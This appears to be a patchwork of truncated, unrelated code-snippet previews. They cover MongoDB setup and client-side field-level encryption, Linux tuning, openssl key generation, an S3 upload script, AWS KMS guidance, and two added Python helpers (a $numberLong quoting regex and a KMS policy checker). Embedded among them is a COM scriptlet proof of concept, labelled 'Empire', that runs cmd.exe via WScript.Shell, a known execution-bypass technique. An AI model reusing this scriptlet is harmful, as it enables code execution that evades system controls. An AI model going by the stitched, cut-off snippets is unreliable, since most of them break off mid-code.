- You have a MongoDB deployment already running and accessible (self-managed or in Atlas)
- You have the modern MongoDB Shell (mongosh) installed locally on your workstation
- You have a KMIP server running and accessible, if you don't intend to use a local keyfile (for an example of running and configuring a HashiCorp Vault development instance, see: Hashicorp Vault Configuration For MongoDB KMIP Use)
[{
  "name": "Angela Merkel",
  "dob": {
    "$date": {
      "$numberLong": "-487900800000"
    }
  },
  "phone": "+49 30 182722720",
  "address": {
    "street": "Willy-Brandt-Straße 1",
# ulimit -a
# sudo sysctl net.ipv4.tcp_fastopen=3
# sudo sysctl vm.max_map_count=524288
# note: "-l" (max locked memory) has no soft limit
# apt-get install numactl
# note: the ulimit below only applies to this sh -c subshell and the
# processes it starts, not to the calling shell
sudo sh -c "sysctl -w net.ipv4.tcp_fastopen=3 ; \
sysctl -w vm.max_map_count=524288 ; \
ulimit -l unlimited ; \
Regular expression for Sublime to find & replace and add double quotes, turning
"$numberLong": 706213333988
into
"$numberLong": "706213333988"
Use this (make sure the [.*] regex button on the left is pressed)
Find: \$numberLong": (.*)
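As an added example (not from the original gist), the same transform done in Python instead of a Sublime find/replace. The pattern here matches only a bare, optionally negative integer after `"$numberLong":`, so unlike a greedy `(.*)` it never swallows a trailing brace or comma on the same line, and running it twice is harmless. The sample documents are constructed for the example.

```python
import json
import re

# Matches "$numberLong": followed by a bare (optionally negative) integer.
# Only an unquoted integer is matched, so the substitution is idempotent and,
# unlike a greedy `(.*)`, never captures a trailing comma or brace on the line.
_BARE_NUMBER_LONG = re.compile(r'("\$numberLong"\s*:\s*)(-?\d+)')


def quote_number_long(text: str) -> str:
    """Wrap bare $numberLong integers in double quotes, as Extended JSON requires."""
    return _BARE_NUMBER_LONG.sub(r'\1"\2"', text)


# Constructed sample, not from the original gist: a positive value on its own
# line, a negative value, a value followed by closing braces on the same line,
# and one that is already quoted and must be left alone.
SAMPLE = """[
  { "name": "a", "dob": { "$date": {
    "$numberLong": 706213333988
  } } },
  { "name": "b", "dob": { "$date": { "$numberLong": -487900800000 } } },
  { "name": "c", "dob": { "$date": { "$numberLong": "1000" } } }
]
"""


def number_long_values(text: str) -> list:
    """Parse the text as JSON and return each $numberLong value in document order."""
    return [d["dob"]["$date"]["$numberLong"] for d in json.loads(text)]


if __name__ == "__main__":
    fixed = quote_number_long(SAMPLE)
    print(fixed)
    print(number_long_values(fixed))
```

Run it on a file with `python3 fix_numberlong.py < dump.json` style plumbing if you like; the point is that after the substitution every `$numberLong` parses as a string, which is what mongosh and the Extended JSON v2 parsers expect.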
// Create a native JavaScript Date object set to a UTC 00:00:00 timestamp
// Here, the default parameters create a plausible DOB
function randomDate( start = new Date(1935, 0, 1), end = new Date(2004, 0, 1) ) {
  const dt = new Date(+start + Math.random() * (end - start));
  dt.setUTCHours(0, 0, 0, 0);
  return dt;
}
// Random DOB
#!/bin/bash
# This should be executed in a folder in your Linux Files namespace
# You can move these later, but you'll need to reference the files in nginx/apache later
# I chose: /home/kenn/nginx_tmp but /etc/nginx/xxx or /etc/ssl/xxx is probably better
# Just make sure to verify/chown to nginx-readable perms
# Generate RSA signing keys for RSA certs
# openssl genrsa -out rootCA.key 4096
# openssl genrsa -out server.key 4096
/*
CSFLE explicit encryption golang Hello World example
brew install mongodb/brew/libmongocrypt
go get go.mongodb.org/mongo-driver/mongo
go get go.mongodb.org/mongo-driver/bson
go get go.mongodb.org/mongo-driver/mongo/options
go get go.mongodb.org/mongo-driver/mongo/readpref
<?XML version="1.0"?>
<scriptlet>
<registration
    progid="Empire"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
    <!-- Proof Of Concept - Casey Smith @subTee -->
    <script language="JScript">
        <![CDATA[
            var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
#!/usr/bin/env bash
#
# Upload a file to the Amazon S3 service
# Usage:
#   neckbeard-push FILE S3_BUCKET [-a ACL_POLICY] [-i AWS_ACCESS_ID] [-k AWS_SECRET_KEY] [-d debug] [-l write verbose session log]
# Note: If option -l is requested, curl_session.log contains SSL handshake *and* plaintext AWS keys
#
# Ex 1: neckbeard-push foo.log my-bucket -a public-read (with env vars: $AWS_ACCESS_ID & $AWS_SECRET_KEY)
# Ex 2: neckbeard-push foo.log my-bucket -a private -i AKIXXXXX -k aBcDeFgHxxx -d
#
Note: See the AWS KMS Best Practices guide for more specific guidance:
"You should work to ensure that the corresponding key policies follow a model of least privilege. This includes ensuring that you do NOT include kms:* permissions in an IAM policy."
Note: This tutorial will create both an AWS KMS master key and a local key. If you plan to use only a local key, skip to Step 4.
- In the AWS management console, create a project-specific master key:
  - Key Management Service (KMS) / Customer managed keys / Create a key
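An added example, not part of the tutorial or of any AWS tooling: a small Python check that flags the pattern the quoted guidance warns against, a `kms:*` (or any wildcard KMS) action, and additionally an unscoped `Resource: "*"`, in an Allow statement. It is run against two constructed policies. The account id and key id are placeholders, and the action list in the least-privilege policy (kms:Encrypt and kms:Decrypt on one customer managed key) is an assumption about what a CSFLE client needs, not something the tutorial states.

```python
import json

# Constructed example policies, not from the tutorial. Account id and key id
# are placeholders. The first grants every KMS action on every key; the second
# is the least-privilege shape assumed here for a CSFLE client: only the
# envelope-encryption calls it makes, scoped to one customer managed key ARN.
OVERLY_BROAD_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "AllKms",
        "Effect": "Allow",
        "Action": "kms:*",
        "Resource": "*",
    }],
})

LEAST_PRIVILEGE_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "CsfleDataKeyOps",
        "Effect": "Allow",
        "Action": ["kms:Encrypt", "kms:Decrypt"],
        "Resource": "arn:aws:kms:us-east-1:111122223333:key/"
                    "11111111-2222-3333-4444-555555555555",
    }],
})


def _allow_statements(policy_json):
    """Yield (index, statement) for each Allow statement. IAM accepts a single
    statement object as well as a list, so normalise to a list first."""
    statements = json.loads(policy_json).get("Statement", [])
    if isinstance(statements, dict):
        statements = [statements]
    for idx, stmt in enumerate(statements):
        if stmt.get("Effect") == "Allow":
            yield idx, stmt


def _as_list(value):
    """Action and Resource may be a single string or a list; return a list."""
    if value is None:
        return []
    return [value] if isinstance(value, str) else list(value)


def find_wildcard_kms_actions(policy_json):
    """Return (statement index, action) pairs for Allow statements that grant
    KMS via a wildcard: kms:*, a glob such as kms:Re*, or a bare "*".
    An Allow statement written with NotAction is reported too, because it
    grants everything not listed and needs manual review."""
    findings = []
    for idx, stmt in _allow_statements(policy_json):
        if "NotAction" in stmt:
            findings.append((idx, "NotAction"))
        for action in _as_list(stmt.get("Action")):
            if action == "*" or (action.lower().startswith("kms:") and "*" in action):
                findings.append((idx, action))
    return findings


def find_unscoped_kms_statements(policy_json):
    """Return indexes of Allow statements that name a kms: action (or "*")
    but use Resource "*" instead of a key or alias ARN."""
    findings = []
    for idx, stmt in _allow_statements(policy_json):
        actions = _as_list(stmt.get("Action"))
        touches_kms = any(a == "*" or a.lower().startswith("kms:") for a in actions)
        if touches_kms and "*" in _as_list(stmt.get("Resource")):
            findings.append(idx)
    return findings


def check_kms_policy(policy_json):
    """Combine both checks into a single report dict."""
    return {
        "wildcard_actions": find_wildcard_kms_actions(policy_json),
        "unscoped_statements": find_unscoped_kms_statements(policy_json),
    }


if __name__ == "__main__":
    for name, policy in (("overly broad", OVERLY_BROAD_POLICY),
                         ("least privilege", LEAST_PRIVILEGE_POLICY)):
        print(name, check_kms_policy(policy))
```

The check only looks at identity-based IAM policy documents; the key policy attached to the CMK itself follows the same Statement grammar and can be fed through the same functions, but conditions (for example `kms:ViaService`) and Deny statements are not evaluated here.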